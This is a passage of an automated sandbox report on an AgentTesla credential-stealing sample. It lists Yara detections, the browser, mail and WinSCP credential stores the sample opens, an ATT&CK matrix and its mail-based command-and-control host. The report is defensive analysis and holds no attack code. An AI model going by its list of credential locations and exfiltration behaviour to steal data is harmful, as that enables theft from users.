                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Users\user\AppData\Roaming\TuZRpLi.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Users\user\AppData\Roaming\TuZRpLi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: TuZRpLi.exe PID: 7400, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		221
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427139 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 46 mail.thelamalab.com 2->46 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 10 other signatures 2->56 8 SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe 7 2->8         started        12 TuZRpLi.exe 5 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\Roaming\TuZRpLi.exe, PE32 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp8319.tmp, XML 8->44 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Adds a directory exclusion to Windows Defender 8->62 14 SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        28 2 other processes 8->28 64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 68 Injects a PE file into a foreign processes 12->68 22 TuZRpLi.exe 12->22         started        24 schtasks.exe 12->24         started        26 TuZRpLi.exe 12->26         started        30 2 other processes 12->30 signatures6 process7 dnsIp8 48 mail.thelamalab.com 162.222.226.100, 49704, 49705, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->48 70 Loading BitLocker PowerShell Module 18->70 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->72 74 Tries to steal Mail credentials (via file / registry access) 22->74 76 Tries to harvest and steal browser information (history, passwords, etc) 22->76 38 conhost.exe 24->38         started        40 conhost.exe 28->40         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe18%ReversingLabsWin32.Trojan.Generic
                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe30%VirustotalBrowse
                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\TuZRpLi.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\TuZRpLi.exe18%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\TuZRpLi.exe30%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.thelamalab.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.thelamalab.com0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.thelamalab.com
                      		162.222.226.100
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.thelamalab.comSecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, TuZRpLi.exe, 0000000A.00000002.2050510414.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          162.222.226.100
                          		mail.thelamalab.comUnited States
                          		394695PUBLIC-DOMAIN-REGISTRYUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1427139
                          Start date and time:2024-04-17 04:37:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 56s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@27/15@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 160
                          • Number of non-executed functions: 12
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          04:37:55API Interceptor20x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe modified
                          04:37:57Task SchedulerRun new task: TuZRpLi path: C:\Users\user\AppData\Roaming\TuZRpLi.exe
                          04:37:57API Interceptor31x Sleep call for process: powershell.exe modified
                          04:37:59API Interceptor15x Sleep call for process: TuZRpLi.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.222.226.100SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                            receipt-73633T36X90N.exeGet hashmaliciousAgentTeslaBrowse
                              AQQ-T7630-CVE8.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exeGet hashmaliciousAgentTeslaBrowse
                                  SCAN_INCORRECT_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                    SecuriteInfo.com.Heur.26171.30744.exeGet hashmaliciousAgentTeslaBrowse
                                      INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                        INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.thelamalab.comSHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            receipt-73633T36X90N.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
                                            AQQ-T7630-CVE8.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.222.226.100
